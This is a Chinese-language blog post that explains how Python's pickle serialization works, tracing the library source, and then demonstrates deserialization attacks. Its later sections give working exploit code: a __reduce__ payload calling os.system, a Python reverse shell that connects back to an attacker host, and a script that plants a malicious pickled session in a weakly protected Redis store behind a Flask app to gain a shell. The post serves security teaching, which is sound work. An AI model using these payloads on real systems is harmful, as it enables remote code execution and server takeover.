<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="python,">










<meta name="description" content="python序列化与反序列化以及实战利用">
<meta name="keywords" content="python">
<meta property="og:type" content="article">
<meta property="og:title" content="python序列化与反序列化">
<meta property="og:url" content="http://yoursite.com/2020/05/09/python序列化与反序列化/index.html">
<meta property="og:site_name" content="lockcy&#39;s cave">
<meta property="og:description" content="python序列化与反序列化以及实战利用">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://yoursite.com/2020/05/09/python序列化与反序列化/1.png">
<meta property="og:image" content="http://yoursite.com/2020/05/09/python序列化与反序列化/2.png">
<meta property="og:image" content="http://yoursite.com/2020/05/09/python序列化与反序列化/3.png">
<meta property="og:image" content="http://yoursite.com/2020/05/09/python序列化与反序列化/4.png">
<meta property="og:updated_time" content="2020-05-09T03:03:10.635Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="python序列化与反序列化">
<meta name="twitter:description" content="python序列化与反序列化以及实战利用">
<meta name="twitter:image" content="http://yoursite.com/2020/05/09/python序列化与反序列化/1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/05/09/python序列化与反序列化/">





  <title>python序列化与反序列化 | lockcy's cave</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">lockcy's cave</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/05/09/python序列化与反序列化/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="ICCTW">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="lockcy's cave">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">python序列化与反序列化</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-05-09T10:56:10+08:00">
                2020-05-09
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>python序列化与反序列化以及实战利用</p>
<a id="more"></a>
<ol>
<li>Python序列化与反序列化</li>
</ol>
<p>Python序列化一般由cPickle和pickle两个库实现，而pickle一般会自带</p>
<p>cPickle是用C编写的，所以它的速度可以比pickle快1000倍。但是它不支持Pickler（）和Unpickler（）类的子类化</p>
<p>“Pickling”是将Python对象层次结构转换为字节流的过程， “unpickling”是反向操作，从而将字节流（来自二进制文件或类似字节的对象）转换回对象层次结构。pickle模块对于错误或恶意构造的数据是不安全的。</p>
<p>一、pickle基本用法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"># -*- coding: utf-8 -*-</span><br><span class="line">import pickle</span><br><span class="line">a=&apos;1234&apos;</span><br><span class="line">with open (&apos;test1.txt&apos;,&apos;wb&apos;) as f:</span><br><span class="line">        pickle.dump(a,f)</span><br></pre></td></tr></table></figure>

<p>test1.txt</p>
<img src="/2020/05/09/python序列化与反序列化/1.png">
<p>二、源码分析<br>序列化<br>Pickle最开始定义了常量 协议号和标志位<br>HIGHEST_PROTOCOL = 4<br>DEFAULT_PROTOCOL = 3<br>STOP           = b’.’<br>PROTO          = b’\x80’</p>
<p>初始化函数中传递了一些变量值</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">  if protocol is None:</span><br><span class="line">            protocol = DEFAULT_PROTOCOL</span><br><span class="line">        if protocol &lt; 0:</span><br><span class="line">            protocol = HIGHEST_PROTOCOL</span><br><span class="line">self.proto = int(protocol)</span><br></pre></td></tr></table></figure>

<p>跟进dump函数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">if self.proto &gt;= 2:</span><br><span class="line">    self.write(PROTO + pack(&quot;&lt;B&quot;, self.proto))</span><br><span class="line">if self.proto &gt;= 4:</span><br><span class="line">    self.framer.start_framing()</span><br><span class="line">self.save(obj)</span><br><span class="line">self.write(STOP)</span><br><span class="line">self.framer.end_framing()</span><br></pre></td></tr></table></figure>

<p>继续跟进save函数<br>以下简化部分代码，仅显示与序列化过程有关的代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">  def save(self, obj, save_persistent_id=True):</span><br><span class="line">t = type(obj)</span><br><span class="line"># Check the type dispatch table</span><br><span class="line">t = type(obj)</span><br><span class="line">f = self.dispatch.get(t)</span><br><span class="line">if f is not None:</span><br><span class="line">f(self, obj) # Call unbound method with explicit self</span><br><span class="line">    return</span><br><span class="line">   # Check private dispatch table if any, or else copyreg.dispatch_table</span><br><span class="line">        reduce = getattr(self, &apos;dispatch_table&apos;, dispatch_table).get(t)</span><br><span class="line">        if reduce is not None:</span><br><span class="line">            rv = reduce(obj)</span><br><span class="line">        else:</span><br><span class="line">            # Check for a class with a custom metaclass; treat as regular class</span><br><span class="line">            try:</span><br><span class="line">                issc = issubclass(t, type)</span><br><span class="line">            except TypeError: # t is not a class (old Boost; see SF #502085)</span><br><span class="line">                issc = False</span><br><span class="line">            if issc:</span><br><span class="line">                self.save_global(obj)</span><br><span class="line">                return</span><br></pre></td></tr></table></figure>

<p>这里根据序列化对象的类型有不同的调度器，输出一下dispatch看得更清楚</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&lt;class &apos;NoneType&apos;&gt;: &lt;function _Pickler.save_none at 0x00000212FF863268&gt;, &lt;class &apos;bool&apos;&gt;: &lt;function _Pickler.save_bool at 0x00000212FF8632F0&gt;, &lt;class &apos;int&apos;&gt;: &lt;function _Pickler.save_long at 0x00000212FF863378&gt;, &lt;class &apos;float&apos;&gt;: &lt;function _Pickler.save_float at 0x00000212FF863400&gt;, &lt;class &apos;bytes&apos;&gt;: &lt;function _Pickler.save_bytes at 0x00000212FF863488&gt;, &lt;class &apos;str&apos;&gt;: &lt;function _Pickler.save_str at 0x00000212FF863510&gt;, &lt;class &apos;tuple&apos;&gt;: &lt;function _Pickler.save_tuple at 0x00000212FF863598&gt;, &lt;class &apos;list&apos;&gt;: &lt;function _Pickler.save_list at 0x00000212FF863620&gt;, &lt;class &apos;dict&apos;&gt;: &lt;function _Pickler.save_dict at 0x00000212FF863730&gt;, &lt;class &apos;set&apos;&gt;: &lt;function _Pickler.save_set at 0x00000212FF863840&gt;, &lt;class &apos;frozenset&apos;&gt;: &lt;function _Pickler.save_frozenset at 0x00000212FF8638C8&gt;, &lt;class &apos;function&apos;&gt;: &lt;function _Pickler.save_global at 0x00000212FF863950&gt;, &lt;class &apos;type&apos;&gt;: &lt;function _Pickler.save_type at 0x00000212FF8639D8&gt;&#125;</span><br></pre></td></tr></table></figure>

<p>本例的对象为字符串类型，调用save_str函数<br>跟进save_str函数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">if self.bin:</span><br><span class="line">    encoded = obj.encode(&apos;utf-8&apos;, &apos;surrogatepass&apos;)</span><br><span class="line">    n = len(encoded)</span><br><span class="line">    if n &lt;= 0xff and self.proto &gt;= 4:</span><br><span class="line">        self.write(SHORT_BINUNICODE + pack(&quot;&lt;B&quot;, n) + encoded)</span><br><span class="line">    elif n &gt; 0xffffffff and self.proto &gt;= 4:</span><br><span class="line">        self._write_large_bytes(BINUNICODE8 + pack(&quot;&lt;Q&quot;, n), encoded)</span><br><span class="line">    elif n &gt;= self.framer._FRAME_SIZE_TARGET:</span><br><span class="line">        self._write_large_bytes(BINUNICODE + pack(&quot;&lt;I&quot;, n), encoded)</span><br><span class="line">    else:</span><br><span class="line">        self.write(BINUNICODE + pack(&quot;&lt;I&quot;, n) + encoded)</span><br><span class="line">else:</span><br><span class="line">    obj = obj.replace(&quot;\\&quot;, &quot;\\u005c&quot;)</span><br><span class="line">    obj = obj.replace(&quot;\n&quot;, &quot;\\u000a&quot;)</span><br><span class="line">    self.write(UNICODE + obj.encode(&apos;raw-unicode-escape&apos;) +</span><br><span class="line">               b&apos;\n&apos;)</span><br><span class="line">self.memoize(obj)</span><br></pre></td></tr></table></figure>

<img src="/2020/05/09/python序列化与反序列化/2.png">
<p>所以pickle对 对象序列化的流程大致如下</p>
<ol>
<li>初始化_Pickler类，进行一些中间变量的赋值，写头标志位</li>
<li>调用类中save函数，确定传入对象的类型并使用相应函数处理（save_str、save_long……）</li>
<li>将结果写入内存，并加上STOP尾标志位</li>
</ol>
<p>但如果第二部查询调度器并没有查询到对应的方法，即对象的type不在NoneType/bool/builtin/classobj/dict/float/function/instance/int/list/long/str/tuple/type/unicode这些类型中的时候，首先查看是否存在<strong>reduce_ex</strong>,如果存在则不再查找<strong>reduce</strong>，不存在的话则继续查找<strong>reduce</strong>;进而判断该函数返回值是string还是tuple，前者进入save_global;后者进入危险开始的save_reduce函数。</p>
<p>定义的类对象不在dispatch中的情况（恶意对象）：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">import pickle</span><br><span class="line">import os</span><br><span class="line">class A():</span><br><span class="line">    def __reduce__(self):</span><br><span class="line">        a = &apos;whoami&apos;</span><br><span class="line">        return (os.system,(a,))</span><br><span class="line"></span><br><span class="line">a=&quot;test&quot;</span><br><span class="line">print (pickle._Pickler.dispatch.get(type(a)))</span><br><span class="line">print (pickle._Pickler.dispatch.get(type(A)))</span><br><span class="line">print (pickle._Pickler.dispatch.get(type(A())))</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;function _Pickler.save_str at 0x000001FD12C93510&gt;</span><br><span class="line">&lt;function _Pickler.save_type at 0x000001FD12C939D8&gt;</span><br><span class="line">None</span><br></pre></td></tr></table></figure>

<p>save_global函数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"># Check for a __reduce_ex__ method, fall back to __reduce__</span><br><span class="line">        reduce = getattr(obj, &quot;__reduce_ex__&quot;, None)</span><br><span class="line">        if reduce is not None:</span><br><span class="line">            rv = reduce(self.proto)</span><br><span class="line">        else:</span><br><span class="line">            reduce = getattr(obj, &quot;__reduce__&quot;, None)</span><br><span class="line">            if reduce is not None:</span><br><span class="line">                rv = reduce()</span><br><span class="line">            else:</span><br><span class="line">                raise PicklingError(&quot;Can&apos;t pickle %r object: %r&quot; %</span><br><span class="line">                                    (t.__name__, obj))</span><br></pre></td></tr></table></figure>

<p>save_reduce会将<strong>reduce</strong>返回的tuple结果，调用save_tuple方法进行序列化存储<br>恶意对象序列化后的结果为<br>b’\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.’</p>
<p>反序列化<br>反序列化的过程也很好理解，如下<br>这里以上边的恶意对象为例<br>跟进load函数，读取第一个字符并分配调度器，<br>key = read(1)<br>dispatch<a href="self">key[0]</a><br>第一个字符为c，调度器分配函数load_global来处理。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">（99: &lt;function _Unpickler.load_global at 0x00000212FF865488&gt;）</span><br></pre></td></tr></table></figure>

<p>Load_global函数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"> module = self.readline()[:-1].decode(&quot;utf-8&quot;)   #读取第一行剩下的nt作为module</span><br><span class="line"> name = self.readline()[:-1].decode(&quot;utf-8&quot;)		#读取第二行的system作为name</span><br><span class="line"> klass = self.find_class(module, name)      #将module和name传入klass</span><br><span class="line"> self.append(klass)</span><br><span class="line">dispatch[GLOBAL[0]] = load_global</span><br></pre></td></tr></table></figure>

<p>find_class函数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">def find_class(self, module, name):</span><br><span class="line">        __import__(module, level=0)</span><br><span class="line">         return getattr(sys.modules[module], name)</span><br></pre></td></tr></table></figure>

<p>find_class函数返回system方法，并在load_global函数中压入栈，并在load_reduce函数中取出方法和参数执行恶意代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">def load_reduce(self):</span><br><span class="line">    stack = self.stack</span><br><span class="line">    args = stack.pop()</span><br><span class="line">    func = stack[-1]</span><br><span class="line">    stack[-1] = func(*args)</span><br></pre></td></tr></table></figure>

<p>三、具体利用</p>
<p>靶机执行如下代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">import pickle</span><br><span class="line">import os</span><br><span class="line">class A(object):</span><br><span class="line">def __reduce__(self):</span><br><span class="line"> a = &quot;&quot;&quot;python -c &apos;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.10.10.128&quot;,9000));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);&apos;&quot;&quot;&quot;</span><br><span class="line">        return (os.system,(a,))    </span><br><span class="line">result = pickle.dumps(A())</span><br><span class="line">pickle.loads(result)</span><br></pre></td></tr></table></figure>

<p>攻击机获得shell</p>
<img src="/2020/05/09/python序列化与反序列化/3.png">
<p>四、实战<br>例1 <a href="https://segmentfault.com/a/1190000013099825" target="_blank" rel="noopener">https://segmentfault.com/a/1190000013099825</a><br>flask中默认使用客户端session，如果想要配置服务端session，就需要使用flask_session配合Redis,而flask_session对session的序列化是通过pickle实现的</p>
<p>如果redis存在未授权或弱口令，使得我们可以修改session，便可以任意代码执行</p>
<p>服务器：ubuntu 1604 10.10.10.130<br>攻击机：kali linux   10.10.10.128</p>
<p>服务器端代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">import redis</span><br><span class="line">import os</span><br><span class="line">from flask import Flask,session</span><br><span class="line">from flask_session import Session</span><br><span class="line">app = Flask(__name__)</span><br><span class="line">SESSION_TYPE = &apos;redis&apos;</span><br><span class="line">SESSION_PERMANENT = False</span><br><span class="line">SESSION_USE_SIGNER = False</span><br><span class="line">SESSION_KEY_PREFIX = &apos;session&apos;</span><br><span class="line">SESSION_REDIS = redis.Redis(host=&apos;127.0.0.1&apos;,port=&apos;6379&apos;)</span><br><span class="line">SESSION_COOKIE_HTTPONLY = True</span><br><span class="line">PERMANENT_SESSION_LIFETIME = 604800  # 7 days</span><br><span class="line">app.config.from_object(__name__)</span><br><span class="line">Session(app)</span><br><span class="line"></span><br><span class="line">@app.route(&apos;/&apos;)</span><br><span class="line">def hello_world():</span><br><span class="line">    session[&apos;name&apos;]=&apos;test&apos;</span><br><span class="line">    return &apos;Hello World!&apos;</span><br><span class="line"></span><br><span class="line">if __name__ == &apos;__main__&apos;:</span><br><span class="line">app.run(host=&apos;0.0.0.0&apos;)</span><br></pre></td></tr></table></figure>

<p>访问服务器生产的session</p>
<img src="/2020/05/09/python序列化与反序列化/4.png">
<p>在redis中查询session</p>


<p>修改session</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">import pickle</span><br><span class="line">import os</span><br><span class="line">import redis</span><br><span class="line">class A(object):</span><br><span class="line">    def __reduce__(self):</span><br><span class="line">        a = &quot;&quot;&quot;python3 -c &apos;import socket,subprocess,os;s=socket.socket(socket.A$</span><br><span class="line">        return (os.system,(a,))    </span><br><span class="line">b=A()</span><br><span class="line">result = pickle.dumps(b)</span><br><span class="line">r = redis.Redis(host=&apos;10.10.10.130,port=6379,password=&apos;123456&apos;)</span><br><span class="line">r.set(&apos;session7ed80af9-014f-45ea-9349-8b3aba0584b1&apos;,result)</span><br></pre></td></tr></table></figure>

<p>刷新浏览器getshell</p>
<p>四、问题</p>
<p>本文所分析的pickle为python3.x自带的，与python2.x有一部分出入：<br>1.协议版本源码处理略有不同<br>2.因为python2和python3在新式类和经典类方面的区别，造成如下情况：<br>在python2中必须显式继承object，即为新式类才能进入save_reduce函数，否则无法执行<br>而在python3中，因为没有新式类经典类的区别，就不需要显示继承object了</p>
<p><a href="https://segmentfault.com/a/1190000013099825" target="_blank" rel="noopener">https://segmentfault.com/a/1190000013099825</a><br><a href="https://segmentfault.com/a/1190000013214956" target="_blank" rel="noopener">https://segmentfault.com/a/1190000013214956</a><br><a href="https://www.cnblogs.com/baby-lily/p/10990026.html" target="_blank" rel="noopener">https://www.cnblogs.com/baby-lily/p/10990026.html</a></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/python/" rel="tag"># python</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/03/19/weex/" rel="next" title="weex">
                <i class="fa fa-chevron-left"></i> weex
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/05/09/weex开发实战（一）/" rel="prev" title="weex开发实战（一）">
                weex开发实战（一） <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      

      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">ICCTW</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">34</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ICCTW</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>




<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<span id="busuanzi_container_site_pv">本站总访问量<span id="busuanzi_value_site_pv"></span>次</span>
<span class="post-meta-divider">|</span>
<span id="busuanzi_container_site_uv">本站访客数<span id="busuanzi_value_site_uv" < span>人</span>



        







        
      </span></div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/miku.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":false},"log":false});</script></body>
</html>
